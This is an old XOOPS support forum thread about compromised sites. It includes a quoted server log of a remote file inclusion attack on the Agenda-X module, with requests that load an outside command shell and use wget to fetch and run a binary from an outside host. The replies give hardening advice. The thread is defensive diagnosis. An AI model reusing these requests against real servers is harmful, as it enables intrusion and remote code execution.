1
Anonymous
My site got hacked...
  • 2004/2/23 8:30

  • Anonymous

  • Posts: 0

  • Since:


I've been using XOOPS for a while now on my site and for some reason just recently my site was completely hacked. My host is looking into the issue and trying to discover who and where it came from. But the problem remains that even after I changed all my passwords, the hacker later entered into my site and deleted everything. The only thing I can think of is that they got the password from mainfile.php by some sort of vulnerability perhaps with the script? Is there any known security vulnerability I should know about and waht do I need to do to make sure this never happens again. I've been using 2.0.5

2
irmtfan
Re: My site got hacked...
  • 2004/2/23 11:00

  • irmtfan

  • Module Developer

  • Posts: 3419

  • Since: 2003/12/7


in mainfile.php could find only database info:

username

userpass

database name

u must set permission for mainfile.php to 444 ( read only )

but it seems that the hacker find the pass & delete database?

is this happened???

3
DonXoop
Re: My site got hacked...

Did they hack it by altering the configs or overwriting the files? If they overwrote files than mainfile.php is not the problem since they didn't do any XOOPS admin functions. They simply had file access. That means they either had FTP access or shell access on the server. Time to change host providers.

4
bassyard
Re: My site got hacked...
  • 2004/2/23 13:32

  • bassyard

  • Not too shy to talk

  • Posts: 157

  • Since: 2003/10/5


My site was hacked today too, I just received a mail from my provider, it seems that somebody was trying to hack the Agenda-X module. My provider has locked it until we sort out the problem... I'll post the log files later today (I'm @ work now)

Anybody who suffered the same problem??

Greetz B.

5
bassyard
Re: My site got hacked...
  • 2004/2/23 13:38

  • bassyard

  • Not too shy to talk

  • Posts: 157

  • Since: 2003/10/5


Here's the log file that my provider send me:

Quote:

We did have to deactivate your /content/modules/agendax/... scripts since it has been abused
by hackers. Please find the logfiles below.
Please DO NOT REACTIVATE the script until you have found a solution to
this security-bug in the script and update us on any of your actions.

http://www.pressurelab.com 200.100.172.246 - - [23/Feb/2004:05:53:28 +0100] "GET /content/modules/agendax/addevent.inc.php?agendax_path=http://www.juventudedosamba.hpg.ig.com.br/cmd.txt?&cmd=id;uname%20-a HTTP/1.1" 200 822 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
http://www.pressurelab.com 200.100.172.246 - - [23/Feb/2004:05:54:46 +0100] "GET /content/modules/agendax/addevent.inc.php?agendax_path=http://www.juventudedosamba.hpg.ig.com.br/cmd.txt?&cmd=id;uname%20-a HTTP/1.1" 200 822 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
http://www.pressurelab.com 200.100.172.246 - - [23/Feb/2004:05:55:30 +0100] "GET /content/modules/agendax/addevent.inc.php?agendax_path=http://www.juventudedosamba.hpg.ig.com.br/cmd.txt?&cmd=cd%20/;cd%20/tmp/;ls HTTP/1.1" 200 2806 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
http://www.pressurelab.com 200.100.172.246 - - [23/Feb/2004:05:56:05 +0100] "GET /content/modules/agendax/addevent.inc.php?agendax_path=http://www.juventudedosamba.hpg.ig.com.br/cmd.txt?&cmd=cd%20/;cd%20/tmp/;wget%20www.crookies.hpg.com.br/cgi;chmod%20777%20cgi;./cgi HTTP/1.1" 200 702 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
http://www.pressurelab.com 200.100.172.246 - - [23/Feb/2004:05:56:58 +0100] "GET /content/modules/agendax/addevent.inc.php?agendax_path=http://www.juventudedosamba.hpg.ig.com.br/cmd.txt?&cmd=pwd HTTP/1.1" 200 742 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
http://www.pressurelab.com 200.100.172.246 - - [23/Feb/2004:05:57:36 +0100] "GET /content/modules/agendax/addevent.inc.php?agendax_path=http://www.juventudedosamba.hpg.ig.com.br/cmd.txt?&cmd=cd%20/;%20cd%20/usr/local/psa/home/vhosts/pressurelab.com/httpdocs/;ls;touch%20aa.txt HTTP/1.1" 200 1037 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"


btw my site: http://www.pressurelab.com

6
Jan304
Re: My site got hacked...
  • 2004/2/23 13:39

  • Jan304

  • Official Support Member

  • Posts: 520

  • Since: 2002/3/31


Again people, why do you think there is something like an update? XOOPS 2.0.5 has an security flaw in the mylinks module (as said in that post, URGENT UPDATE).

So people, if there comes an upgrade, this is most of the times for something... And about the Agenda-x module, there was a security flaw till version 1.2.3. Please download the lastest secure version here.

7
bassyard
Re: My site got hacked...
  • 2004/2/23 13:42

  • bassyard

  • Not too shy to talk

  • Posts: 157

  • Since: 2003/10/5


Jan304:

I'm running XOOPS 2.0.6 so there's no problem there,

But I'll check for that Aganda-X update when I get home...

Thanx

8
DonXoop
Re: My site got hacked...

Agenda-X is the other problem if you are not at 1.2.4. Two things, upgrade to the latest and turn register_globals Off in php.ini. If the provider won't do that or allow .htaccess files so you can do it yourself than time to change providers.

I've had dozens of attempts to hack agenda-x and other things. They get nowhere so far. Don't go light on security.

9
bassyard
Re: My site got hacked...
  • 2004/2/23 13:46

  • bassyard

  • Not too shy to talk

  • Posts: 157

  • Since: 2003/10/5


Quote:

DonXoop wrote:
Agenda-X is the other problem if you are not at 1.2.4. Two things, upgrade to the latest and turn register_globals Off in php.ini. If the provider won't do that or allow .htaccess files so you can do it yourself than time to change providers.

I've had dozens of attempts to hack agenda-x and other things. They get nowhere so far. Don't go light on security.


Thanx DonXoop I'll try it tonight... I've got a real good provider, so I'm sure I can fix it

10
DonXoop
Re: My site got hacked...

Here's a little bit I add to the /modules/agenda-x/.htaccess file. It turns off register_globals (they are off at the server level but this makes sure), and it traps direct attempts at files called by the crackers.

Quote:
php_value register_globals 0


Order Deny,Allow
Deny from all



Order Deny,Allow
Deny from all



Order Deny,Allow
Deny from all



Order Deny,Allow
Deny from all


Login

Who's Online

307 user(s) are online (99 user(s) are browsing Support Forums)


Members: 0


Guests: 307


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits